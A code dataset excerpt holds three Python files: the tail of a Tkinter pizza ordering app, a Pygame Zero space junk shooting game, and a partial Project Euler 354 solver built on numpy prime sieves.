MenuPage(PizzaData,OrderType)\r\n elif ((OrderType) == (\"Delivery\")):\r\n if Name == \"\":\r\n print(\"Error in Name\")\r\n elif Address == \"\":\r\n print(\"Error in Address\")\r\n elif Phone ==\"\":\r\n print(\"Error in Phone\")\r\n else:\r\n MenuPage(PizzaData,OrderType)\r\n else:\r\n print(\"Error in Order Type\")\r\n return\r\n\r\ndef ExitFun(Win):\r\n Win.destroy()\r\n return\r\n\r\ndef CleaFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox):\r\n global OrderType\r\n OrderType = (\"\")\r\n PickBut.config(state=\"normal\")\r\n DeliBut.config(state=\"normal\")\r\n NameBox.delete(0,\"end\")\r\n AddrBox.delete(0,\"end\")\r\n PhonBox.delete(0,\"end\")\r\n NameBox.config(state=\"disabled\")\r\n AddrBox.config(state=\"disabled\")\r\n PhonBox.config(state=\"disabled\")\r\n\r\n return\r\n\r\ndef MenuPage(PizzaData,OrderType):\r\n global PizzaOrder\r\n \r\n Win2 = Toplevel()\r\n Win2.title(\"Tony's Pizza Menu\")\r\n Win2.geometry(\"360x720\")\r\n Win2.config(bg=\"#fff2cc\")\r\n\r\n TitleText = Label(Win2,text=\"Tony's 
Pizza\")\r\n SubText1 = Label(Win2,text = \"Standard Pizzas\") \r\n\r\n Pizza1Text = Label(Win2,text = (PizzaData[0][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza2Text = Label(Win2,text = (PizzaData[1][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza3Text = Label(Win2,text = (PizzaData[2][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza4Text = Label(Win2,text = (PizzaData[3][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza5Text = Label(Win2,text = (PizzaData[4][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza6Text = Label(Win2,text = (PizzaData[5][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza7Text = Label(Win2,text = (PizzaData[6][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza8Text = Label(Win2,text = (PizzaData[7][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza9Text = Label(Win2,text = (PizzaData[8][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza10Text = Label(Win2,text = (PizzaData[9][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza11Text = Label(Win2,text = (PizzaData[10][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza12Text = Label(Win2,text = (PizzaData[11][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n \r\n \r\n\r\n OrderText = Label(Win2,text=(\"Order\"),bg=(\"#cfe2f3\"),fg=(\"#000000\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n OrderText1 = Label(Win2,text=\"\")\r\n OrderText2 = Label(Win2,text=\"\")\r\n OrderText3 = Label(Win2,text=\"\")\r\n OrderText4 = Label(Win2,text=\"\")\r\n OrderText5 = Label(Win2,text=\"\")\r\n OrderBut1 = Button(Win2,text=\"X\",command=lambda:SubFun(0,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut2 = Button(Win2,text=\"X\",command=lambda:SubFun(1,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut3 = Button(Win2,text=\"X\",command=lambda:SubFun(2,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut4 = Button(Win2,text=\"X\",command=lambda:SubFun(3,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut5 = Button(Win2,text=\"X\",command=lambda:SubFun(4,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n \r\n Pizza1But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,0,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza2But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,1,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza3But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,2,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza4But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,3,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza5But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,4,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza6But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 
italic\"),command=lambda:PopOutFun(PizzaData,5,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza7But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,6,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza8But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,7,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza9But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,8,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza10But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,9,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza11But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,10,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza12But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,11,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n\r\n\r\n ExitBut = Button(Win2,text=(\"Exit\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),command=lambda:(ExitFun(Win2)))\r\n OrderBack = Label(Win2,text=(\"\"),bg=(\"#cfe2f3\"))\r\n\r\n TitleText.pack()\r\n SubText1.pack()\r\n\r\n Pizza1Text.pack()\r\n Pizza1But.pack() \r\n Pizza2Text.pack()\r\n Pizza2But.pack() \r\n Pizza3Text.pack()\r\n Pizza3But.pack()\r\n Pizza4Text.pack()\r\n Pizza4But.pack()\r\n Pizza5Text.pack()\r\n Pizza5But.pack()\r\n #Pizza6Text.pack()\r\n #Pizza6But.pack()\r\n #Pizza7Text.pack()\r\n #Pizza7But.pack()\r\n Pizza8Text.pack()\r\n Pizza8But.pack()\r\n Pizza9Text.pack()\r\n Pizza9But.pack()\r\n #Pizza10Text.pack()\r\n #Pizza10But.pack()\r\n #Pizza11Text.pack()\r\n #Pizza11But.pack()\r\n #Pizza12Text.pack()\r\n #Pizza12But.pack()\r\n\r\n ExitBut.pack()\r\n #OrderBack.place(x=40,y=40,height=\"320\",width=\"320\")\r\n OrderText1.pack()\r\n OrderText2.pack()\r\n OrderText3.pack()\r\n OrderText4.pack()\r\n OrderText5.pack()\r\n OrderBut1.pack()\r\n OrderBut2.pack()\r\n OrderBut3.pack()\r\n OrderBut4.pack()\r\n OrderBut5.pack()\r\n return\r\n\r\ndef PopOutFun(PizzaData,PizzaNum,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5):\r\n \r\n if (PizzaData[PizzaNum][1] == \"8.5\"):\r\n PizzaType = str(\"Standard \")\r\n elif (PizzaData[PizzaNum][1]) == \"13.5\":\r\n PizzaType =str(\"Gorumet\")\r\n\r\n Win3 = Toplevel()\r\n Win3.geometry(\"360x360\")\r\n Win3.config(bg=\"#fff2cc\")\r\n\r\n TitleText = Label(Win3,text=(\"Tony's Pizza\"),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n SubText1 = Label(Win3,text=(PizzaData[PizzaNum][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\")) \r\n PizzaText1 = Label(Win3,text=(PizzaType),font=(\"{Trebuchet MS} 10 italic\"))\r\n PizzaText2 = Label(Win3,text=(PizzaData[PizzaNum][1]),font=(\"{Trebuchet MS} 10 italic\"))\r\n PizzaInfoText = Label(Win3,text=(PizzaData[PizzaNum][2]))\r\n\r\n AddBut = Button(Win3,text=(\"Add to Order\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),command=lambda:AddFun(len(PizzaOrder[0]),PizzaData,PizzaNum,AddBox.get(),OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n AddBox = Entry(Win3,bg=(\"#cfe2f3\"),fg=(\"#000000\"))\r\n 
AddBox.insert(END,1)\r\n Exit = Button(Win3,text=(\"Exit\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),command=lambda:ExitFun(Win3))\r\n\r\n TitleText.pack()\r\n SubText1.pack()\r\n PizzaText1.pack()\r\n PizzaText2.pack()\r\n PizzaInfoText.pack()\r\n AddBox.pack()\r\n AddBut.pack()\r\n Exit.pack()\r\n return\r\n\r\ndef AddFun(PizzaOrderSize,PizzaData,PizzaNum,PizzaQt,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5):\r\n global PizzaOrder\r\n try:\r\n PizzaQt=int(PizzaQt)\r\n if ((PizzaQt)<=0):\r\n print(\"Error Invalid Qt.\")\r\n elif ((PizzaOrderSize+PizzaQt)>=(6)):\r\n print(\"Error 5 pizza max.\")\r\n else: \r\n PizzaOrder[0].append(PizzaData[PizzaNum][0])\r\n PizzaOrder[1].append(PizzaData[PizzaNum][1])\r\n if(PizzaOrderSize==0):\r\n OrderText1.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==1):\r\n OrderText2.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==2):\r\n OrderText3.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==3):\r\n OrderText4.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==4):\r\n OrderText5.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n except ValueError:\r\n print(\"Error Invalid Qt.\")\r\n return\r\n\r\ndef SubFun(OrderPos,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5):\r\n if ((len(PizzaOrder[0]))<=0):\r\n print(\"Error No pizzas\")\r\n elif ((len(PizzaOrder[0]))<=(OrderPos)):\r\n print(\"Error No Pizza in order slot\")\r\n else:\r\n PizzaOrder[0].pop(OrderPos)\r\n PizzaOrder[1].pop(OrderPos)\r\n if ((len(PizzaOrder[0]))==0):\r\n OrderText1.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==1):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==2):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=((PizzaOrder[0][1])+\" \"+(PizzaOrder[1][1])))\r\n OrderText3.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==3):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=((PizzaOrder[0][1])+\" \"+(PizzaOrder[1][1])))\r\n OrderText3.config(text=((PizzaOrder[0][2])+\" \"+(PizzaOrder[1][2])))\r\n OrderText4.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==4):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=((PizzaOrder[0][1])+\" \"+(PizzaOrder[1][1])))\r\n OrderText3.config(text=((PizzaOrder[0][2])+\" \"+(PizzaOrder[1][2])))\r\n OrderText4.config(text=((PizzaOrder[0][3])+\" \"+(PizzaOrder[1][3])))\r\n OrderText5.config(text=(\"\"))\r\n else:\r\n print(\"Error in logic 1\")\r\n return\r\nPizzaData = RetInfo()\r\nCustPage(PizzaData)\r\n","sub_path":"V1.7.py","file_name":"V1.7.py","file_ext":"py","file_size_in_byte":14121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"527844804","text":"# Intro to GameDev - main game file\nimport pgzrun\nimport random\n\nWIDTH = 1000\nHEIGHT = 600\n\nSCOREBOX_HEIGHT = 60\n\n#keep track of score\nscore = 0\njunk_collect = 0\nlevel = 0\nlevel_screen = 0\nlvl2_LIMIT = 5\nlvl3_LIMIT = 10\n\n#sprite speeds\nJUNK_SPEED = 5\nSATELLITE_SPEED = 3\nDEBRIS_SPEED = 3\nLASER_SPEED = -5 # lasers are moving towards the left on screen\n\nBACKGROUND_IMG = 
\"background_logo\"\nPLAYER_IMG = \"player\"\nJUNK_IMG = \"space_junk\"\nSATELLITE_IMG = \"satellite_adv\"\nDEBRIS_IMG = \"space_debris2\"\nLASER_IMG = \"laser_red\"\nSTART_IMG = \"start_button\"\nINSTRUCTIONS_IMG = \"instructions_button\"\n\ndef init():\n global player, junks, lasers, satellite, debris\n player = Actor(PLAYER_IMG)\n player.midright = (WIDTH - 15, HEIGHT/2)\n\n # initialize junk sprites\n junks = [] # list to keep track of junks\n for i in range(5):\n junk = Actor(JUNK_IMG) # create a junk sprite\n x_pos = random.randint(-500, -50)\n y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)\n junk.topright = (x_pos, y_pos) # rect_position = (x, y)\n junks.append(junk)\n\n # initialize lasers\n lasers = []\n player.laserActive = 1\n\n # initialize satellite\n satellite = Actor(SATELLITE_IMG) # create sprite\n x_sat = random.randint(-500, -50)\n y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)\n satellite.topright = (x_sat, y_sat) # rect_position\n\n # initialize debris\n debris = Actor(DEBRIS_IMG)\n x_deb = random.randint(-500, -50)\n y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)\n debris.topright = (x_deb, y_deb)\n\n # background music\n music.play(\"spacelife\")\n\n# initialize title screen buttons\nstart_button = Actor(START_IMG)\nstart_button.center = (WIDTH/2, 425)\ninstructions_button = Actor(INSTRUCTIONS_IMG)\ninstructions_button.center = (WIDTH/2, 500)\n\ndef on_mouse_down(pos):\n global level, level_screen\n if start_button.collidepoint(pos):\n level = 1\n level_screen = 1\n print(\"start button pressed!\")\n if instructions_button.collidepoint(pos):\n level = -1\n print(\"instructions button pressed!\")\n \n# game loop\ninit()\n\ndef update():\n global score, junk_collect, level, level_screen, BACKGROUND_IMG\n if junk_collect == lvl2_LIMIT: # level 2\n level = 2\n if junk_collect == lvl3_LIMIT: # level 3\n level = 3\n if level == -1: # instructions screen\n BACKGROUND_IMG = \"background_level1\"\n\n if score >= 0 and level >= 1:\n if level_screen == 1: # level 1 title screen\n BACKGROUND_IMG = \"background_level1\"\n if keyboard.RETURN == 1:\n level_screen = 2\n if level_screen == 2: # level 1 gameplay\n updatePlayer() # calling our player update function\n updateJunk() # calling junk update function\n if level == 2 and level_screen <= 3: # level 2 title\n BACKGROUND_IMG = \"background_level2\"\n level_screen = 3\n if keyboard.RETURN == 1:\n level_screen = 4\n if level_screen == 4: # level 2 gameplay\n updatePlayer()\n updateJunk()\n updateSatellite()\n if level == 3 and level_screen <= 5: # level 3 title\n level_screen = 5\n BACKGROUND_IMG = \"background_level3\"\n if keyboard.RETURN == 1:\n level_screen = 6\n if level_screen == 6: # level 3 game play\n updatePlayer()\n updateJunk()\n updateSatellite()\n updateDebris()\n updateLasers()\n\n if score < 0 or level == -2: # game over or end game\n if keyboard.RETURN == 1:\n BACKGROUND_IMG = \"background_logo\"\n score = 0\n junk_collect = 0\n level = 0\n init()\n \ndef draw():\n screen.clear()\n screen.blit(BACKGROUND_IMG, (0,0))\n if level == -1:\n start_button.draw()\n show_instructions = \"Use UP and DOWN arrow keys to move your player\\n\\npress SPACEBAR to shoot\"\n screen.draw.text(show_instructions, midtop=(WIDTH/2, 70), fontsize=35, color=\"white\")\n if level == 0:\n start_button.draw()\n instructions_button.draw()\n if level >= 1:\n player.draw() # draw player sprite on screen\n for junk in junks:\n junk.draw() # draw junk sprite on screen\n if level >= 2:\n 
    if level >= 2:\n        satellite.draw()\n    if level == 3:\n        debris.draw()\n        for laser in lasers:\n            laser.draw()\n\n    # game over screen\n    if score < 0:\n        game_over = \"GAME OVER\\npress ENTER to play again\"\n        screen.draw.text(game_over, center=(WIDTH / 2, HEIGHT / 2), fontsize=60, color=\"white\")\n\n    # draw some text on the screen\n    show_score = \"Score: \" + str(score) # remember to convert score to a string\n    screen.draw.text(show_score, topleft=(650, 15), fontsize=35, color=\"white\")\n    show_collect_value = \"Junk: \" + str(junk_collect)\n    screen.draw.text(show_collect_value, topleft=(450, 15), fontsize=35, color=\"white\")\n\n    if level >= 1:\n        show_level = \"LEVEL \" + str(level)\n        screen.draw.text(show_level, topright=(375, 15), fontsize=35, color=\"white\")\n\n    if level_screen == 1 or level_screen == 3 or level_screen == 5:\n        show_level_title = \"LEVEL \" + str(level) + \"\\nPress ENTER to continue...\"\n        screen.draw.text(show_level_title, center=(WIDTH/2, HEIGHT/2), fontsize=70, color=\"white\")\n\n# make separate functions for each of our sprites\ndef updatePlayer():\n    # check for user input\n    if keyboard.up == 1:\n        player.y += -5 # moving up is in the negative y direction\n    elif keyboard.down == 1:\n        player.y += 5 # moving down is in the positive y direction\n\n    # prevent player from moving off screen\n    if player.top < 0:\n        player.top = 0\n    if player.bottom > HEIGHT:\n        player.bottom = HEIGHT\n\n    # check for firing lasers\n    if keyboard.space == 1 and level == 3:\n        laser = Actor(LASER_IMG)\n        laser.midright = player.midleft\n        fireLasers(laser) # this is a function from the template code\n\ndef updateJunk():\n    global score, junk_collect\n    for junk in junks:\n        junk.x += JUNK_SPEED\n\n        collision = player.colliderect(junk)\n        if junk.left > WIDTH or collision == 1:\n            x_pos = random.randint(-500, -50)\n            y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)\n            junk.topleft = (x_pos, y_pos)\n\n        # collisions between player and junk\n        if collision:\n            score += 1 # update the score\n            junk_collect += 1\n\ndef updateSatellite():\n    global score\n    satellite.x += SATELLITE_SPEED # or just put 3\n\n    collision = player.colliderect(satellite)\n    if satellite.left > WIDTH or collision == 1:\n        x_sat = random.randint(-500, -50)\n        y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)\n        satellite.topright = (x_sat, y_sat)\n\n    if collision == 1:\n        score += -10\n\ndef updateDebris():\n    global score\n    debris.x += DEBRIS_SPEED # or just put 3\n\n    collision = player.colliderect(debris)\n    if debris.left > WIDTH or collision == 1:\n        x_deb = random.randint(-500, -50)\n        y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)\n        debris.topright = (x_deb, y_deb)\n\n    if collision == 1:\n        score += -10\n\n\ndef updateLasers():\n    global score\n    for laser in lasers[:]: # iterate over a copy so removing from the list is safe\n        laser.x += LASER_SPEED\n        # remove laser if it moves off screen\n        if laser.right < 0:\n            lasers.remove(laser)\n            continue\n        # check for collisions; elif ensures each laser is removed at most once\n        if satellite.colliderect(laser) == 1:\n            lasers.remove(laser)\n            x_sat = random.randint(-500, -50)\n            y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)\n            satellite.topright = (x_sat, y_sat)\n            score += -5 # decrease the score\n        elif debris.colliderect(laser) == 1:\n            lasers.remove(laser)\n            x_deb = random.randint(-500, -50)\n            y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)\n            debris.topright = (x_deb, y_deb)\n            score += 5 # increase the score\n\n# activating lasers (template code)____________________________________\nplayer.laserActive = 1 # add laserActive status to the player\n
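# debounce: fireLasers clears laserActive and clock.schedule re-arms it 0.2 s later,\n# so holding SPACE fires roughly five shots per second instead of one per frame\n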
def makeLaserActive(): # when called, this function will make lasers active again\n    global player\n    player.laserActive = 1\n\ndef fireLasers(laser):\n    if player.laserActive == 1: # active status prevents continuous shooting while the space key is held\n        player.laserActive = 0\n        clock.schedule(makeLaserActive, 0.2) # schedule an event (function, time after which the event will occur)\n        sounds.laserfire02.play() # play sound effect\n        lasers.append(laser) # add laser to lasers list\n\npgzrun.go()\n","sub_path":"my_space_game.py","file_name":"my_space_game.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"351135134","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\nPE_0354\n\nDistances in a bee's honeycomb\n\nSee p233\n\n58065134\n\nCreated on Fri Oct 13 09:41:49 2017\n\n@author: mbh\n\"\"\"\n\nimport time\nimport numpy as np\n\ndef p354(limit):\n    t=time.perf_counter()\n\n    limit=int(limit)\n\n    ps=candidates1(limit)+candidates2(limit)+candidates3(limit)\n\n#    psa=np.array(ps)\n\n    print(time.perf_counter()-t)\n\n#    ns=[]\n#\n#    lLog=np.log(limit)\n#    log3root=np.log(3**0.5)\n#    mults=(lLog-np.log(psa))//log3root\n#    print('mults:',len(mults),sum(mults))\n#    print(time.clock()-t)\n#\n#    return mults\n\n    ns=[]\n\n    # each candidate is scaled by successive powers of sqrt(3) while it stays under the limit\n    for p in ps:\n        p*=3**0.5\n        while p<=limit:\n            ns.append(p)\n            p*=3**0.5\n\n    print('ns:',time.perf_counter()-t)\n\n    print(len(ns),min(ns),limit//min(ns))\n\n    qgood=[p for p in notPrime3k1Factor(np.int64(limit/min(ns)))]\n\n    print(time.perf_counter()-t)\n\n    nfinal=[]\n#    count=0\n#    lLog=np.log(limit)\n#    qLogs=[np.log(q) for q in qgood]\n#\n#    print(time.clock()-t)\n#\n#    for n in ns:\n#        for ql in qLogs:\n#            k=(lLog-np.log(3**0.5*n))//ql\n#            total=(k+1)*sumFrac(min(m,k+1))\n\n    for n in ns:\n        for q in qgood:\n            nq=n*q\n            if nq>limit:\n                break\n            nfinal.append(nq)\n\n    print('nfinal',len(nfinal))\n    print(time.perf_counter()-t)\n\n#    return nfinal\n\n# case p1^2.p2^7 where the p are primes = 1 mod 3\ndef candidates1(limit):\n    p1lim=int((limit/7**7)**0.5)\n    p2lim=int((limit/7**2)**(1/7))\n    pfs=primeSieve(max(p1lim,p2lim))\n    pfs=pfs[pfs%3==1]\n    p1s=[int(p) for p in pfs[pfs<=p1lim]]\n    p2s=[int(p) for p in pfs[pfs<=p2lim]]\n    ps=[]\n    for p1 in p1s:\n        for p2 in p2s:\n            if p2==p1:\n                continue\n            pprod=pow(p1,2)*pow(p2,7)\n            if pprod<=limit:\n                ps.append(pprod)\n    return ps\n\n# case p1.7^12 where p is a prime = 1 mod 3\ndef candidates2(limit):\n    ps=[]\n    plim=int(limit/7**12)\n    pfs=[int(p) for p in primeSieve(plim) if p%3==1]\n    for p in pfs[1:]: # skip 7 itself, since p1 must differ from 7\n        pprod=7**12*p\n        if pprod<=limit:\n            ps.append(pprod)\n    return ps\n\n# case p1.p2^2.p3^2 where the p are primes = 1 mod 3\ndef candidates3(limit):\n    ps=[]\n    p1lim=int(limit/(7**2*13**2))\n    p23lim=int((limit/(7**2*13))**(1/2))\n    pfs=primeSieve(max([p1lim,p23lim]))\n    pfs=pfs[pfs%3==1]\n    p1s=[int(p) for p in pfs[pfs<=p1lim]]\n    p23s=[int(p) for p in pfs[pfs<=p23lim]]\n    for p1 in p1s:\n        p2lim=(limit/(p1*7**2))**(1/2)\n        for p2 in p23s:\n            if p2==p1:\n                continue\n            if p2>p2lim:\n                break\n            p3lim=(limit/(p1*p2**2))**(1/2)\n            for p3 in p23s:\n                if p3<=p2 or p3==p1:\n                    continue\n                if p3>p3lim:\n                    break\n                pprod=p1*p2**2*p3**2\n                if pprod<=limit:\n                    ps.append(pprod)\n    return ps\n\ndef primeSieve(n):\n    \"\"\"return array of primes 2<=p<=n\"\"\"\n    sieve=np.ones(n+1,dtype=bool) # np.bool was removed in NumPy 1.24; plain bool works everywhere\n    for i in range(2, int((n+1)**0.5+1)):\n        if sieve[i]:\n            sieve[2*i::i]=False\n    return np.nonzero(sieve)[0][2:]\n\ndef notPrime3k1Factor(n):\n    \"\"\"return array of numbers not divisible by 3 or by any prime p = 1 mod 3\"\"\"\n
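    # sieve sketch: mark every index as allowed, then strike out all multiples of each\n    # prime p = 1 (mod 3); multiples of 3 are dropped from the survivors at the end\n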
    sieve=np.ones(n+1,dtype=bool) # plain bool, since np.bool is gone from modern NumPy\n    ps=primeSieve(n)\n    ps=ps[ps%3==1]\n    for i in ps:\n        if sieve[i]:\n            sieve[i::i]=False\n    ps=np.nonzero(sieve)[0]\n    return ps[ps%3!=0].astype(np.int64)\n\ndef sumFrac(k,nMax):\n    \"\"\"return cumulative sums of floor(k/n) for n = 1..nMax\"\"\"\n    sums={1:k} # floor(k/1) is k, not 1\n    for n in range(2,nMax+1):\n        sums[n]=sums[n-1]+k//n\n    return sums","sub_path":"PE_0354/PE_0354.py","file_name":"PE_0354.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}